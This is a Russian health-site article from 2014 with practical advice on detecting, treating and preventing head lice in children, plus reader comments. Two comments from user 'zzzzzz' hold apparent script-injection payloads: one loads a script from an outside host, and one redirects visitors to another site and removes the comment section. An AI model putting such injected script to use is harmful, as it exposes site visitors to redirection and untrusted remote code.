Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как избавиться от вшей у ...  >>  Как избавиться от вшей у ребенка
 
Обратная связь
 

Как избавиться от вшей у ребенка

Размер шрифта
06 августа 2014 00:00
  • google_analytics: false
  • Нравится

Кошмар каждого родителя – проблема, которая практически круглогодична, но число случаев достигает своего пика, когда дети идут в школу.

Как избавиться от вшей у ребенка

От 6 до 12 миллионов случаев головного педикулеза происходят каждый год в США у детей в возрасте от 3 до 11 лет, согласно данным Центра по контролю и профилактике заболеваний. Вши являются наиболее распространенной проблемой среди детей дошкольного возраста, посещающих детский сад, а также среди детей младшего школьного возраста, напасть может затронуть и других членов семьи.

Вопреки мифу, вши никак не связаны с плохой гигиеной. Они распространяются в основном при непосредственном контакте головы с головой человека, у которого уже есть вши. Вы не можете получить вшей от своих домашних животных, так как вши обитают только на людях.

Вши не летают и не прыгают; они двигаются ползком. Но ведь дети так тесно играют вместе, часто большими группами, поэтому вши могут легко путешествовать от ребенка к ребенку, особенно когда они касаются головами во время игры или говорят друг с другом.

Кровососущие жучки

Вши – кровососущие насекомые, размером с кунжутное семя, рыжеватого или серовато-белого цвета. Они присасываются к коже на голове и откладывают яйца (гниды) в волосах.

Вы можете проверить волосы на вшей и гнид в нескольких местах. Вы можете использовать увеличительное стекло и яркий свет, чтобы помочь выявить их. Так как головные вши могут двигаться быстро, проще обнаружить гниды. Последние могут выглядеть как перхоть, но вы можете отличить их, подняв прядь волос и потянув ногтем по всей длине, где вы подозреваете гнида. Перхоть оторвется легко, а гниды будут оставаться прочно прикрепленными к волосам.

Препараты для лечения головного педикулеза включают в себя как рецептурные, так и не рецептурные препараты в виде шампуней, кремов и лосьонов. Перед применением обязательно ознакомьтесь с этикеткой, так как возможны противопоказания по возрасту.  

Шаги для безопасного использования

Следуйте этим советам, чтобы безопасно и надлежащим образом использовать любой препарат для лечения вшей:

  • после обработки волос и кожи головы, используйте расческу с мелкими зубьями, чтобы удалить мертвых вшей и гнид,
  • нанесите средство только на кожу головы и волосы,
  • перед лечением маленьких детей проконсультируйтесь с врачом,
  • используйте препарат точно в соответствии с указаниями на этикетке и ни в коем случае не чаще.

Предотвращение вшей

  • Объясните детям, что следует избегать контакта с головами других детей во время игры и других мероприятий в школе, на спортивных мероприятиях, детских площадках и лагерях.
  • Научите детей не делиться одеждой, шапками, шарфами, шлемами, спортивной формой, полотенцами, расческами, щетками, банданами, резинками для волос и наушниками.
  • Дезинфицируйте расчески и щетки, используемые человеком с педикулезом путем замачивания их в горячей воде в течение 5-10 минут. Обрабатывайте кровати, диваны, подушки или ковры, которые были в контакте с человеком, страдающим от педикулеза.
  • Обязательно стирайте все вещи, которые были в контакте с человеком последние 48 часов до начала лечения.
  • Одежда и предметы, которые невозможно постирать, следует сдать в химчистку.
  • Проведите тщательную уборку дома и других помещений, где находился человек. Вши живут один-два дня, если они падают с головы и не могут дальше прокормиться.
  • Не используйте инсектицидные аэрозоли, они не избавят от вшей, зато могут быть токсичными при вдыхании или всасываться через кожу.
  • Через неделю после окончания лечения проверьте всех в вашей семье на наличие вшей. Если они обнаружатся, свяжитесь с врачом.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

21 апреля 2015 в 03:33

Цитировать   |   Пожаловаться

Ох уж и зараза) ну, спасибо.

2 - Гость

21 апреля 2015 в 03:34

Цитировать   |   Пожаловаться

Дочура приносила вшей домой три раза за прошлый год, про гребень Антив слышала давно, да все как то руки не доходили заказать, вымывали шампуньками, когда дочка принесла в третий раз, таки заказали гребешок. Собственно, с того момента про вшей вспоминаю только тогда ,когда гребешок на глаза попадается. 

3 - zzzzzz

30 июня 2015 в 18:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 22:31

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Всемирная неделя первичного иммунодефицита начинается в Москве!   Беременность: как обезопасить себя и будущего малыша от вирусов   С какого возраста малышам можно давать иммуномодуляторы?   Страшные сны у ребенка – признак того, что его обижают в школе! Что делать?  
03 октября 2013Результаты благотворительного марафона «Всем миром» 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
Можно ли пережить беременность без рвоты?
Убийцы в вашей ванной
Можно ли подгадать с беременностью?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.